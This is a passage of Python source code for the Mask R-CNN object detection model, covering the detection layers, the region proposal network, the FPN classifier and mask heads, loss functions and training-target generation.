target_class_ids: [batch, TRAIN_ROIS_PER_IMAGE]. Integer class IDs. target_deltas: [batch, TRAIN_ROIS_PER_IMAGE, (dy, dx, log(dh), log(dw)] target_mask: [batch, TRAIN_ROIS_PER_IMAGE, height, width] Masks cropped to bbox boundaries and resized to neural network output size. Note: Returned arrays might be zero padded if not enough target ROIs. """ def __init__(self, config, **kwargs): super(DetectionTargetLayer, self).__init__(**kwargs) self.config = config def call(self, inputs): proposals = inputs[0] gt_class_ids = inputs[1] gt_boxes = inputs[2] gt_masks = inputs[3] # Slice the batch and run a graph for each slice # TODO: Rename target_bbox to target_deltas for clarity names = ["rois", "target_class_ids", "target_bbox", "target_mask"] outputs = utils.batch_slice( [proposals, gt_class_ids, gt_boxes, gt_masks], lambda w, x, y, z: detection_targets_graph( w, x, y, z, self.config), self.config.IMAGES_PER_GPU, names=names) return outputs def compute_output_shape(self, input_shape): return [ (None, self.config.TRAIN_ROIS_PER_IMAGE, 4), # rois (None, self.config.TRAIN_ROIS_PER_IMAGE), # class_ids (None, self.config.TRAIN_ROIS_PER_IMAGE, 4), # deltas (None, self.config.TRAIN_ROIS_PER_IMAGE, self.config.MASK_SHAPE[0], self.config.MASK_SHAPE[1]) # masks ] def compute_mask(self, inputs, mask=None): return [None, None, None, None] ############################################################ # Detection Layer ############################################################ def refine_detections_graph(rois, probs, deltas, window, config): """Refine classified proposals and filter overlaps and return final detections. Inputs: rois: [N, (y1, x1, y2, x2)] in normalized coordinates probs: [N, num_classes]. Class probabilities. deltas: [N, num_classes, (dy, dx, log(dh), log(dw))]. Class-specific bounding box deltas. window: (y1, x1, y2, x2) in normalized coordinates. The part of the image that contains the image excluding the padding. Returns detections shaped: [num_detections, (y1, x1, y2, x2, class_id, score)] where coordinates are normalized. """ # Class IDs per ROI class_ids = tf.argmax(probs, axis=1, output_type=tf.int32) # Class probability of the top class of each ROI indices = tf.stack([tf.range(probs.shape[0]), class_ids], axis=1) class_scores = tf.gather_nd(probs, indices) # Class-specific bounding box deltas deltas_specific = tf.gather_nd(deltas, indices) # Apply bounding box deltas # Shape: [boxes, (y1, x1, y2, x2)] in normalized coordinates refined_rois = apply_box_deltas_graph( rois, deltas_specific * config.BBOX_STD_DEV) # Clip boxes to image window refined_rois = clip_boxes_graph(refined_rois, window) # TODO: Filter out boxes with zero area # Filter out background boxes keep = tf.where(class_ids > 0)[:, 0] # Filter out low confidence boxes if config.DETECTION_MIN_CONFIDENCE: conf_keep = tf.where(class_scores >= config.DETECTION_MIN_CONFIDENCE)[:, 0] keep = tf.sets.set_intersection(tf.expand_dims(keep, 0), tf.expand_dims(conf_keep, 0)) keep = tf.sparse_tensor_to_dense(keep)[0] # Apply per-class NMS # 1. Prepare variables pre_nms_class_ids = tf.gather(class_ids, keep) pre_nms_scores = tf.gather(class_scores, keep) pre_nms_rois = tf.gather(refined_rois, keep) unique_pre_nms_class_ids = tf.unique(pre_nms_class_ids)[0] def nms_keep_map(class_id): """Apply Non-Maximum Suppression on ROIs of the given class.""" # Indices of ROIs of the given class ixs = tf.where(tf.equal(pre_nms_class_ids, class_id))[:, 0] # Apply NMS class_keep = tf.image.non_max_suppression( tf.gather(pre_nms_rois, ixs), tf.gather(pre_nms_scores, ixs), max_output_size=config.DETECTION_MAX_INSTANCES, iou_threshold=config.DETECTION_NMS_THRESHOLD) # Map indices class_keep = tf.gather(keep, tf.gather(ixs, class_keep)) # Pad with -1 so returned tensors have the same shape gap = config.DETECTION_MAX_INSTANCES - tf.shape(class_keep)[0] class_keep = tf.pad(class_keep, [(0, gap)], mode='CONSTANT', constant_values=-1) # Set shape so map_fn() can infer result shape class_keep.set_shape([config.DETECTION_MAX_INSTANCES]) return class_keep # 2. Map over class IDs nms_keep = tf.map_fn(nms_keep_map, unique_pre_nms_class_ids, dtype=tf.int64) # 3. Merge results into one list, and remove -1 padding nms_keep = tf.reshape(nms_keep, [-1]) nms_keep = tf.gather(nms_keep, tf.where(nms_keep > -1)[:, 0]) # 4. Compute intersection between keep and nms_keep keep = tf.sets.set_intersection(tf.expand_dims(keep, 0), tf.expand_dims(nms_keep, 0)) keep = tf.sparse_tensor_to_dense(keep)[0] # Keep top detections roi_count = config.DETECTION_MAX_INSTANCES class_scores_keep = tf.gather(class_scores, keep) num_keep = tf.minimum(tf.shape(class_scores_keep)[0], roi_count) top_ids = tf.nn.top_k(class_scores_keep, k=num_keep, sorted=True)[1] keep = tf.gather(keep, top_ids) # Arrange output as [N, (y1, x1, y2, x2, class_id, score)] # Coordinates are normalized. detections = tf.concat([ tf.gather(refined_rois, keep), tf.to_float(tf.gather(class_ids, keep))[..., tf.newaxis], tf.gather(class_scores, keep)[..., tf.newaxis] ], axis=1) # Pad with zeros if detections < DETECTION_MAX_INSTANCES gap = config.DETECTION_MAX_INSTANCES - tf.shape(detections)[0] detections = tf.pad(detections, [(0, gap), (0, 0)], "CONSTANT") return detections class DetectionLayer(KE.Layer): """Takes classified proposal boxes and their bounding box deltas and returns the final detection boxes. Returns: [batch, num_detections, (y1, x1, y2, x2, class_id, class_score)] where coordinates are normalized. """ def __init__(self, config=None, **kwargs): super(DetectionLayer, self).__init__(**kwargs) self.config = config def call(self, inputs): rois = inputs[0] mrcnn_class = inputs[1] mrcnn_bbox = inputs[2] image_meta = inputs[3] # Get windows of images in normalized coordinates. Windows are the area # in the image that excludes the padding. # Use the shape of the first image in the batch to normalize the window # because we know that all images get resized to the same size. m = parse_image_meta_graph(image_meta) image_shape = m['image_shape'][0] window = norm_boxes_graph(m['window'], image_shape[:2]) # Run detection refinement graph on each item in the batch detections_batch = utils.batch_slice( [rois, mrcnn_class, mrcnn_bbox, window], lambda x, y, w, z: refine_detections_graph(x, y, w, z, self.config), self.config.IMAGES_PER_GPU) # Reshape output # [batch, num_detections, (y1, x1, y2, x2, class_id, class_score)] in # normalized coordinates return tf.reshape( detections_batch, [self.config.BATCH_SIZE, self.config.DETECTION_MAX_INSTANCES, 6]) def compute_output_shape(self, input_shape): return (None, self.config.DETECTION_MAX_INSTANCES, 6) ############################################################ # Region Proposal Network (RPN) ############################################################ def rpn_graph(feature_map, anchors_per_location, anchor_stride): """Builds the computation graph of Region Proposal Network. feature_map: backbone features [batch, height, width, depth] anchors_per_location: number of anchors per pixel in the feature map anchor_stride: Controls the density of anchors. Typically 1 (anchors for every pixel in the feature map), or 2 (every other pixel). Returns: rpn_class_logits: [batch, H * W * anchors_per_location, 2] Anchor classifier logits (before softmax) rpn_probs: [batch, H * W * anchors_per_location, 2] Anchor classifier probabilities. rpn_bbox: [batch, H * W * anchors_per_location, (dy, dx, log(dh), log(dw))] Deltas to be applied to anchors. """ # TODO: check if stride of 2 causes alignment issues if the feature map # is not even. # Shared convolutional base of the RPN shared = KL.Conv2D(512, (3, 3), padding='same', activation='relu', strides=anchor_stride, name='rpn_conv_shared')(feature_map) # Anchor Score. [batch, height, width, anchors per location * 2]. x = KL.Conv2D(2 * anchors_per_location, (1, 1), padding='valid', activation='linear', name='rpn_class_raw')(shared) # Reshape to [batch, anchors, 2] rpn_class_logits = KL.Lambda( lambda t: tf.reshape(t, [tf.shape(t)[0], -1, 2]))(x) # Softmax on last dimension of BG/FG. rpn_probs = KL.Activation( "softmax", name="rpn_class_xxx")(rpn_class_logits) # Bounding box refinement. [batch, H, W, anchors per location * depth] # where depth is [x, y, log(w), log(h)] x = KL.Conv2D(anchors_per_location * 4, (1, 1), padding="valid", activation='linear', name='rpn_bbox_pred')(shared) # Reshape to [batch, anchors, 4] rpn_bbox = KL.Lambda(lambda t: tf.reshape(t, [tf.shape(t)[0], -1, 4]))(x) return [rpn_class_logits, rpn_probs, rpn_bbox] def build_rpn_model(anchor_stride, anchors_per_location, depth): """Builds a Keras model of the Region Proposal Network. It wraps the RPN graph so it can be used multiple times with shared weights. anchors_per_location: number of anchors per pixel in the feature map anchor_stride: Controls the density of anchors. Typically 1 (anchors for every pixel in the feature map), or 2 (every other pixel). depth: Depth of the backbone feature map. Returns a Keras Model object. The model outputs, when called, are: rpn_class_logits: [batch, H * W * anchors_per_location, 2] Anchor classifier logits (before softmax) rpn_probs: [batch, H * W * anchors_per_location, 2] Anchor classifier probabilities. rpn_bbox: [batch, H * W * anchors_per_location, (dy, dx, log(dh), log(dw))] Deltas to be applied to anchors. """ input_feature_map = KL.Input(shape=[None, None, depth], name="input_rpn_feature_map") outputs = rpn_graph(input_feature_map, anchors_per_location, anchor_stride) return KM.Model([input_feature_map], outputs, name="rpn_model") ############################################################ # Feature Pyramid Network Heads ############################################################ def fpn_classifier_graph(rois, feature_maps, image_meta, pool_size, num_classes, train_bn=True, fc_layers_size=1024): """Builds the computation graph of the feature pyramid network classifier and regressor heads. rois: [batch, num_rois, (y1, x1, y2, x2)] Proposal boxes in normalized coordinates. feature_maps: List of feature maps from different layers of the pyramid, [P2, P3, P4, P5]. Each has a different resolution. image_meta: [batch, (meta data)] Image details. See compose_image_meta() pool_size: The width of the square feature map generated from ROI Pooling. num_classes: number of classes, which determines the depth of the results train_bn: Boolean. Train or freeze Batch Norm layers fc_layers_size: Size of the 2 FC layers Returns: logits: [batch, num_rois, NUM_CLASSES] classifier logits (before softmax) probs: [batch, num_rois, NUM_CLASSES] classifier probabilities bbox_deltas: [batch, num_rois, NUM_CLASSES, (dy, dx, log(dh), log(dw))] Deltas to apply to proposal boxes """ # ROI Pooling # Shape: [batch, num_rois, POOL_SIZE, POOL_SIZE, channels] x = PyramidROIAlign([pool_size, pool_size], name="roi_align_classifier")([rois, image_meta] + feature_maps) # Two 1024 FC layers (implemented with Conv2D for consistency) x = KL.TimeDistributed(KL.Conv2D(fc_layers_size, (pool_size, pool_size), padding="valid"), name="mrcnn_class_conv1")(x) x = KL.TimeDistributed(BatchNorm(), name='mrcnn_class_bn1')(x, training=train_bn) x = KL.Activation('relu')(x) x = KL.TimeDistributed(KL.Conv2D(fc_layers_size, (1, 1)), name="mrcnn_class_conv2")(x) x = KL.TimeDistributed(BatchNorm(), name='mrcnn_class_bn2')(x, training=train_bn) x = KL.Activation('relu')(x) shared = KL.Lambda(lambda x: K.squeeze(K.squeeze(x, 3), 2), name="pool_squeeze")(x) # Classifier head mrcnn_class_logits = KL.TimeDistributed(KL.Dense(num_classes), name='mrcnn_class_logits')(shared) mrcnn_probs = KL.TimeDistributed(KL.Activation("softmax"), name="mrcnn_class")(mrcnn_class_logits) # BBox head # [batch, num_rois, NUM_CLASSES * (dy, dx, log(dh), log(dw))] x = KL.TimeDistributed(KL.Dense(num_classes * 4, activation='linear'), name='mrcnn_bbox_fc')(shared) # Reshape to [batch, num_rois, NUM_CLASSES, (dy, dx, log(dh), log(dw))] s = K.int_shape(x) mrcnn_bbox = KL.Reshape((s[1], num_classes, 4), name="mrcnn_bbox")(x) return mrcnn_class_logits, mrcnn_probs, mrcnn_bbox def build_fpn_mask_graph(rois, feature_maps, image_meta, pool_size, num_classes, train_bn=True): """Builds the computation graph of the mask head of Feature Pyramid Network. rois: [batch, num_rois, (y1, x1, y2, x2)] Proposal boxes in normalized coordinates. feature_maps: List of feature maps from different layers of the pyramid, [P2, P3, P4, P5]. Each has a different resolution. image_meta: [batch, (meta data)] Image details. See compose_image_meta() pool_size: The width of the square feature map generated from ROI Pooling. num_classes: number of classes, which determines the depth of the results train_bn: Boolean. Train or freeze Batch Norm layers Returns: Masks [batch, num_rois, MASK_POOL_SIZE, MASK_POOL_SIZE, NUM_CLASSES] """ # ROI Pooling # Shape: [batch, num_rois, MASK_POOL_SIZE, MASK_POOL_SIZE, channels] x = PyramidROIAlign([pool_size, pool_size], name="roi_align_mask")([rois, image_meta] + feature_maps) # Conv layers x = KL.TimeDistributed(KL.Conv2D(256, (3, 3), padding="same"), name="mrcnn_mask_conv1")(x) x = KL.TimeDistributed(BatchNorm(), name='mrcnn_mask_bn1')(x, training=train_bn) x = KL.Activation('relu')(x) x = KL.TimeDistributed(KL.Conv2D(256, (3, 3), padding="same"), name="mrcnn_mask_conv2")(x) x = KL.TimeDistributed(BatchNorm(), name='mrcnn_mask_bn2')(x, training=train_bn) x = KL.Activation('relu')(x) x = KL.TimeDistributed(KL.Conv2D(256, (3, 3), padding="same"), name="mrcnn_mask_conv3")(x) x = KL.TimeDistributed(BatchNorm(), name='mrcnn_mask_bn3')(x, training=train_bn) x = KL.Activation('relu')(x) x = KL.TimeDistributed(KL.Conv2D(256, (3, 3), padding="same"), name="mrcnn_mask_conv4")(x) x = KL.TimeDistributed(BatchNorm(), name='mrcnn_mask_bn4')(x, training=train_bn) x = KL.Activation('relu')(x) x = KL.TimeDistributed(KL.Conv2DTranspose(256, (2, 2), strides=2, activation="relu"), name="mrcnn_mask_deconv")(x) x = KL.TimeDistributed(KL.Conv2D(num_classes, (1, 1), strides=1, activation="sigmoid"), name="mrcnn_mask")(x) return x ############################################################ # Loss Functions ############################################################ def smooth_l1_loss(y_true, y_pred): """Implements Smooth-L1 loss. y_true and y_pred are typically: [N, 4], but could be any shape. """ diff = K.abs(y_true - y_pred) less_than_one = K.cast(K.less(diff, 1.0), "float32") loss = (less_than_one * 0.5 * diff**2) + (1 - less_than_one) * (diff - 0.5) return loss def rpn_class_loss_graph(rpn_match, rpn_class_logits): """RPN anchor classifier loss. rpn_match: [batch, anchors, 1]. Anchor match type. 1=positive, -1=negative, 0=neutral anchor. rpn_class_logits: [batch, anchors, 2]. RPN classifier logits for BG/FG. """ # Squeeze last dim to simplify rpn_match = tf.squeeze(rpn_match, -1) # Get anchor classes. Convert the -1/+1 match to 0/1 values. anchor_class = K.cast(K.equal(rpn_match, 1), tf.int32) # Positive and Negative anchors contribute to the loss, # but neutral anchors (match value = 0) don't. indices = tf.where(K.not_equal(rpn_match, 0)) # Pick rows that contribute to the loss and filter out the rest. rpn_class_logits = tf.gather_nd(rpn_class_logits, indices) anchor_class = tf.gather_nd(anchor_class, indices) # Cross entropy loss loss = K.sparse_categorical_crossentropy(target=anchor_class, output=rpn_class_logits, from_logits=True) loss = K.switch(tf.size(loss) > 0, K.mean(loss), tf.constant(0.0)) return loss def rpn_bbox_loss_graph(config, target_bbox, rpn_match, rpn_bbox): """Return the RPN bounding box loss graph. config: the model config object. target_bbox: [batch, max positive anchors, (dy, dx, log(dh), log(dw))]. Uses 0 padding to fill in unsed bbox deltas. rpn_match: [batch, anchors, 1]. Anchor match type. 1=positive, -1=negative, 0=neutral anchor. rpn_bbox: [batch, anchors, (dy, dx, log(dh), log(dw))] """ # Positive anchors contribute to the loss, but negative and # neutral anchors (match value of 0 or -1) don't. rpn_match = K.squeeze(rpn_match, -1) indices = tf.where(K.equal(rpn_match, 1)) # Pick bbox deltas that contribute to the loss rpn_bbox = tf.gather_nd(rpn_bbox, indices) # Trim target bounding box deltas to the same length as rpn_bbox. batch_counts = K.sum(K.cast(K.equal(rpn_match, 1), tf.int32), axis=1) target_bbox = batch_pack_graph(target_bbox, batch_counts, config.IMAGES_PER_GPU) loss = smooth_l1_loss(target_bbox, rpn_bbox) loss = K.switch(tf.size(loss) > 0, K.mean(loss), tf.constant(0.0)) return loss def mrcnn_class_loss_graph(target_class_ids, pred_class_logits, active_class_ids): """Loss for the classifier head of Mask RCNN. target_class_ids: [batch, num_rois]. Integer class IDs. Uses zero padding to fill in the array. pred_class_logits: [batch, num_rois, num_classes] active_class_ids: [batch, num_classes]. Has a value of 1 for classes that are in the dataset of the image, and 0 for classes that are not in the dataset. """ # During model building, Keras calls this function with # target_class_ids of type float32. Unclear why. Cast it # to int to get around it. target_class_ids = tf.cast(target_class_ids, 'int64') # Find predictions of classes that are not in the dataset. pred_class_ids = tf.argmax(pred_class_logits, axis=2) # TODO: Update this line to work with batch > 1. Right now it assumes all # images in a batch have the same active_class_ids pred_active = tf.gather(active_class_ids[0], pred_class_ids) # Loss loss = tf.nn.sparse_softmax_cross_entropy_with_logits( labels=target_class_ids, logits=pred_class_logits) # Erase losses of predictions of classes that are not in the active # classes of the image. loss = loss * pred_active # Computer loss mean. Use only predictions that contribute # to the loss to get a correct mean. loss = tf.reduce_sum(loss) / tf.reduce_sum(pred_active) return loss def mrcnn_bbox_loss_graph(target_bbox, target_class_ids, pred_bbox): """Loss for Mask R-CNN bounding box refinement. target_bbox: [batch, num_rois, (dy, dx, log(dh), log(dw))] target_class_ids: [batch, num_rois]. Integer class IDs. pred_bbox: [batch, num_rois, num_classes, (dy, dx, log(dh), log(dw))] """ # Reshape to merge batch and roi dimensions for simplicity. target_class_ids = K.reshape(target_class_ids, (-1,)) target_bbox = K.reshape(target_bbox, (-1, 4)) pred_bbox = K.reshape(pred_bbox, (-1, K.int_shape(pred_bbox)[2], 4)) # Only positive ROIs contribute to the loss. And only # the right class_id of each ROI. Get their indices. positive_roi_ix = tf.where(target_class_ids > 0)[:, 0] positive_roi_class_ids = tf.cast( tf.gather(target_class_ids, positive_roi_ix), tf.int64) indices = tf.stack([positive_roi_ix, positive_roi_class_ids], axis=1) # Gather the deltas (predicted and true) that contribute to loss target_bbox = tf.gather(target_bbox, positive_roi_ix) pred_bbox = tf.gather_nd(pred_bbox, indices) # Smooth-L1 Loss loss = K.switch(tf.size(target_bbox) > 0, smooth_l1_loss(y_true=target_bbox, y_pred=pred_bbox), tf.constant(0.0)) loss = K.mean(loss) return loss def mrcnn_mask_loss_graph(target_masks, target_class_ids, pred_masks): """Mask binary cross-entropy loss for the masks head. target_masks: [batch, num_rois, height, width]. A float32 tensor of values 0 or 1. Uses zero padding to fill array. target_class_ids: [batch, num_rois]. Integer class IDs. Zero padded. pred_masks: [batch, proposals, height, width, num_classes] float32 tensor with values from 0 to 1. """ # Reshape for simplicity. Merge first two dimensions into one. target_class_ids = K.reshape(target_class_ids, (-1,)) mask_shape = tf.shape(target_masks) target_masks = K.reshape(target_masks, (-1, mask_shape[2], mask_shape[3])) pred_shape = tf.shape(pred_masks) pred_masks = K.reshape(pred_masks, (-1, pred_shape[2], pred_shape[3], pred_shape[4])) # Permute predicted masks to [N, num_classes, height, width] pred_masks = tf.transpose(pred_masks, [0, 3, 1, 2]) # Only positive ROIs contribute to the loss. And only # the class specific mask of each ROI. positive_ix = tf.where(target_class_ids > 0)[:, 0] positive_class_ids = tf.cast( tf.gather(target_class_ids, positive_ix), tf.int64) indices = tf.stack([positive_ix, positive_class_ids], axis=1) # Gather the masks (predicted and true) that contribute to loss y_true = tf.gather(target_masks, positive_ix) y_pred = tf.gather_nd(pred_masks, indices) # Compute binary cross entropy. If no positive ROIs, then return 0. # shape: [batch, roi, num_classes] loss = K.switch(tf.size(y_true) > 0, K.binary_crossentropy(target=y_true, output=y_pred), tf.constant(0.0)) loss = K.mean(loss) return loss ############################################################ # Data Generator ############################################################ def load_image_gt(dataset, config, image_id, augment=False, augmentation=None, use_mini_mask=False): """Load and return ground truth data for an image (image, mask, bounding boxes). augment: (deprecated. Use augmentation instead). If true, apply random image augmentation. Currently, only horizontal flipping is offered. augmentation: Optional. An imgaug (https://github.com/aleju/imgaug) augmentation. For example, passing imgaug.augmenters.Fliplr(0.5) flips images right/left 50% of the time. use_mini_mask: If False, returns full-size masks that are the same height and width as the original image. These can be big, for example 1024x1024x100 (for 100 instances). Mini masks are smaller, typically, 224x224 and are generated by extracting the bounding box of the object and resizing it to MINI_MASK_SHAPE. Returns: image: [height, width, 3] shape: the original shape of the image before resizing and cropping. class_ids: [instance_count] Integer class IDs bbox: [instance_count, (y1, x1, y2, x2)] mask: [height, width, instance_count]. The height and width are those of the image unless use_mini_mask is True, in which case they are defined in MINI_MASK_SHAPE. """ # Load image and mask image = dataset.load_image(image_id) mask, class_ids = dataset.load_mask(image_id) original_shape = image.shape image, window, scale, padding, crop = utils.resize_image( image, min_dim=config.IMAGE_MIN_DIM, min_scale=config.IMAGE_MIN_SCALE, max_dim=config.IMAGE_MAX_DIM, mode=config.IMAGE_RESIZE_MODE) mask = utils.resize_mask(mask, scale, padding, crop) # Random horizontal flips. # TODO: will be removed in a future update in favor of augmentation if augment: logging.warning("'augment' is deprecated. Use 'augmentation' instead.") if random.randint(0, 1): image = np.fliplr(image) mask = np.fliplr(mask) # Augmentation # This requires the imgaug lib (https://github.com/aleju/imgaug) if augmentation: import imgaug # Augmenters that are safe to apply to masks # Some, such as Affine, have settings that make them unsafe, so always # test your augmentation on masks MASK_AUGMENTERS = ["Sequential", "SomeOf", "OneOf", "Sometimes", "Fliplr", "Flipud", "CropAndPad", "Affine", "PiecewiseAffine"] def hook(images, augmenter, parents, default): """Determines which augmenters to apply to masks.""" return augmenter.__class__.__name__ in MASK_AUGMENTERS # Store shapes before augmentation to compare image_shape = image.shape mask_shape = mask.shape # Make augmenters deterministic to apply similarly to images and masks det = augmentation.to_deterministic() image = det.augment_image(image) # Change mask to np.uint8 because imgaug doesn't support np.bool mask = det.augment_image(mask.astype(np.uint8), hooks=imgaug.HooksImages(activator=hook)) # Verify that shapes didn't change assert image.shape == image_shape, "Augmentation shouldn't change image size" assert mask.shape == mask_shape, "Augmentation shouldn't change mask size" # Change mask back to bool mask = mask.astype(np.bool) # Note that some boxes might be all zeros if the corresponding mask got cropped out. # and here is to filter them out _idx = np.sum(mask, axis=(0, 1)) > 0 mask = mask[:, :, _idx] class_ids = class_ids[_idx] # Bounding boxes. Note that some boxes might be all zeros # if the corresponding mask got cropped out. # bbox: [num_instances, (y1, x1, y2, x2)] bbox = utils.extract_bboxes(mask) # Active classes # Different datasets have different classes, so track the # classes supported in the dataset of this image. active_class_ids = np.zeros([dataset.num_classes], dtype=np.int32) source_class_ids = dataset.source_class_ids[dataset.image_info[image_id]["source"]] active_class_ids[source_class_ids] = 1 # Resize masks to smaller size to reduce memory usage if use_mini_mask: mask = utils.minimize_mask(bbox, mask, config.MINI_MASK_SHAPE) # Image meta data image_meta = compose_image_meta(image_id, original_shape, image.shape, window, scale, active_class_ids) return image, image_meta, class_ids, bbox, mask def build_detection_targets(rpn_rois, gt_class_ids, gt_boxes, gt_masks, config): """Generate targets for training Stage 2 classifier and mask heads. This is not used in normal training. It's useful for debugging or to train the Mask RCNN heads without using the RPN head. Inputs: rpn_rois: [N, (y1, x1, y2, x2)] proposal boxes. gt_class_ids: [instance count] Integer class IDs gt_boxes: [instance count, (y1, x1, y2, x2)] gt_masks: [height, width, instance count] Ground truth masks. Can be full size or mini-masks. Returns: rois: [TRAIN_ROIS_PER_IMAGE, (y1, x1, y2, x2)] class_ids: [TRAIN_ROIS_PER_IMAGE]. Integer class IDs. bboxes: [TRAIN_ROIS_PER_IMAGE, NUM_CLASSES, (y, x, log(h), log(w))]. Class-specific bbox refinements. masks: [TRAIN_ROIS_PER_IMAGE, height, width, NUM_CLASSES). Class specific masks cropped to bbox boundaries and resized to neural network output size. """ assert rpn_rois.shape[0] > 0 assert gt_class_ids.dtype == np.int32, "Expected int but got {}".format( gt_class_ids.dtype) assert gt_boxes.dtype == np.int32, "Expected int but got {}".format( gt_boxes.dtype) assert gt_masks.dtype == np.bool_, "Expected bool but got {}".format( gt_masks.dtype) # It's common to add GT Boxes to ROIs but we don't do that here because # according to XinLei Chen's paper, it doesn't help. # Trim empty padding in gt_boxes and gt_masks parts instance_ids = np.where(gt_class_ids > 0)[0] assert instance_ids.shape[0] > 0, "Image must contain instances." gt_class_ids = gt_class_ids[instance_ids] gt_boxes = gt_boxes[instance_ids] gt_masks = gt_masks[:, :, instance_ids] # Compute areas of ROIs and ground truth boxes. rpn_roi_area = (rpn_rois[:, 2] - rpn_rois[:, 0]) * \ (rpn_rois[:, 3] - rpn_rois[:, 1]) gt_box_area = (gt_boxes[:, 2] - gt_boxes[:, 0]) * \ (gt_boxes[:, 3] - gt_boxes[:, 1]) # Compute overlaps [rpn_rois, gt_boxes] overlaps = np.zeros((rpn_rois.shape[0], gt_boxes.shape[0])) for i in range(overlaps.shape[1]): gt = gt_boxes[i] overlaps[:, i] = utils.compute_iou( gt, rpn_rois, gt_box_area[i], rpn_roi_area) # Assign ROIs to GT boxes rpn_roi_iou_argmax = np.argmax(overlaps, axis=1) rpn_roi_iou_max = overlaps[np.arange( overlaps.shape[0]), rpn_roi_iou_argmax] # GT box assigned to each ROI rpn_roi_gt_boxes = gt_boxes[rpn_roi_iou_argmax] rpn_roi_gt_class_ids = gt_class_ids[rpn_roi_iou_argmax] # Positive ROIs are those with >= 0.5 IoU with a GT box. fg_ids = np.where(rpn_roi_iou_max > 0.5)[0] # Negative ROIs are those with max IoU 0.1-0.5 (hard example mining) # TODO: To hard example mine or not to hard example mine, that's the question # bg_ids = np.where((rpn_roi_iou_max >= 0.1) & (rpn_roi_iou_max < 0.5))[0] bg_ids = np.where(rpn_roi_iou_max < 0.5)[0] # Subsample ROIs. Aim for 33% foreground. # FG fg_roi_count = int(config.TRAIN_ROIS_PER_IMAGE * config.ROI_POSITIVE_RATIO) if fg_ids.shape[0] > fg_roi_count: keep_fg_ids = np.random.choice(fg_ids, fg_roi_count, replace=False) else: keep_fg_ids = fg_ids # BG remaining = config.TRAIN_ROIS_PER_IMAGE - keep_fg_ids.shape[0] if bg_ids.shape[0] > remaining: keep_bg_ids = np.random.choice(bg_ids, remaining, replace=False) else: keep_bg_ids = bg_ids # Combine indices of ROIs to keep keep = np.concatenate([keep_fg_ids, keep_bg_ids]) # Need more? remaining = config.TRAIN_ROIS_PER_IMAGE - keep.shape[0] if remaining > 0: # Looks like we don't have enough samples to maintain the desired # balance. Reduce requirements and fill in the rest. This is # likely different from the Mask RCNN paper. # There is a small chance we have neither fg nor bg samples. if keep.shape[0] == 0: # Pick bg regions with easier IoU threshold bg_ids = np.where(rpn_roi_iou_max < 0.5)[0] assert bg_ids.shape[0] >= remaining keep_bg_ids = np.random.choice(bg_ids, remaining, replace=False) assert keep_bg_ids.shape[0] == remaining keep = np.concatenate([keep, keep_bg_ids]) else: # Fill the rest with repeated bg rois. keep_extra_ids = np.random.choice( keep_bg_ids, remaining, replace=True) keep = np.concatenate([keep, keep_extra_ids]) assert keep.shape[0] == config.TRAIN_ROIS_PER_IMAGE, \ "keep doesn't match ROI batch size {}, {}".format( keep.shape[0], config.TRAIN_ROIS_PER_IMAGE) # Reset the gt boxes assigned to BG ROIs. rpn_roi_gt_boxes[keep_bg_ids, :] = 0 rpn_roi_gt_class_ids[keep_bg_ids] = 0 # For each kept ROI, assign a class_id, and for FG ROIs also add bbox refinement. rois = rpn_rois[keep] roi_gt_boxes = rpn_roi_gt_boxes[keep] roi_gt_class_ids = rpn_roi_gt_class_ids[keep] roi_gt_assignment = rpn_roi_iou_argmax[keep] # Class-aware bbox deltas. [y, x, log(h), log(w)] bboxes = np.zeros((config.TRAIN_ROIS_PER_IMAGE, config.NUM_CLASSES, 4), dtype=np.float32) pos_ids = np.where(roi_gt_class_ids > 0)[0] bboxes[pos_ids, roi_gt_class_ids[pos_ids]] = utils.box_refinement( rois[pos_ids], roi_gt_boxes[pos_ids, :4]) # Normalize bbox refinements bboxes /= config.BBOX_STD_DEV # Generate class-specific target masks masks = np.zeros((config.TRAIN_ROIS_PER_IMAGE, config.MASK_SHAPE[0], config.MASK_SHAPE[1], config.NUM_CLASSES), dtype=np.float32) for i in pos_ids: class_id = roi_gt_class_ids[i] assert class_id > 0, "class id must be greater than 0" gt_id = roi_gt_assignment[i] class_mask = gt_masks[:, :, gt_id] if config.USE_MINI_MASK: # Create a mask placeholder, the size of the image placeholder = np.zeros(config.IMAGE_SHAPE[:2], dtype=bool) # GT box gt_y1, gt_x1, gt_y2, gt_x2 = gt_boxes[gt_id] gt_w = gt_x2 - gt_x1 gt_h = gt_y2 - gt_y1 # Resize mini mask to size of GT box placeholder[gt_y1:gt_y2, gt_x1:gt_x2] = \ np.round(utils.resize(class_mask, (gt_h, gt_w))).astype(bool) # Place the mini batch in the placeholder class_mask = placeholder # Pick part of the mask and resize it y1, x1, y2, x2 = rois[i].astype(np.int32) m = class_mask[y1:y2, x1:x2] mask = utils.resize(m, config.MASK_SHAPE) masks[i, :, :, class_id] = mask return rois, roi_gt_class_ids, bboxes, masks def build_rpn_targets(image_shape, anchors, gt_class_ids, gt_boxes, config): """Given the anchors and GT boxes, compute overlaps and identify positive anchors and deltas to refine them to match their corresponding GT boxes. anchors: [num_anchors, (y1, x1, y2, x2)] gt_class_ids: [num_gt_boxes] Integer class IDs. gt_boxes: [num_gt_boxes, (y1, x1, y2, x2)] Returns: rpn_match: [N] (int32) matches between anchors and GT boxes. 1 = positive anchor, -1 = negative anchor, 0 = neutral rpn_bbox: [N, (dy, dx, log(dh), log(dw))] Anchor bbox deltas. """ # RPN Match: 1 = positive anchor, -1 = negative anchor, 0 = neutral rpn_match = np.zeros([anchors.shape[0]], dtype=np.int32) # RPN bounding boxes: [max anchors per image, (dy, dx, log(dh), log(dw))] rpn_bbox = np.zeros((config.RPN_TRAIN_ANCHORS_PER_IMAGE, 4)) # Handle COCO crowds # A crowd box in COCO is a bounding box around several instances. Exclude # them from training. A crowd box is given a negative class ID. crowd_ix = np.where(gt_class_ids < 0)[0] if crowd_ix.shape[0] > 0: # Filter out crowds from ground truth class IDs and boxes non_crowd_ix = np.where(gt_class_ids > 0)[0] crowd_boxes = gt_boxes[crowd_ix] gt_class_ids = gt_class_ids[non_crowd_ix] gt_boxes = gt_boxes[non_crowd_ix] # Compute overlaps with crowd boxes [anchors, crowds] crowd_overlaps = utils.compute_overlaps(anchors, crowd_boxes) crowd_iou_max = np.amax(crowd_overlaps, axis=1) no_crowd_bool = (crowd_iou_max < 0.001) else: # All anchors don't intersect a crowd no_crowd_bool = np.ones([anchors.shape[0]], dtype=bool) # Compute overlaps [num_anchors, num_gt_boxes] overlaps = utils.compute_overlaps(anchors, gt_boxes) # Match anchors to GT Boxes # If an anchor overlaps a GT box with IoU >= 0.7 then it's positive. # If an anchor overlaps a 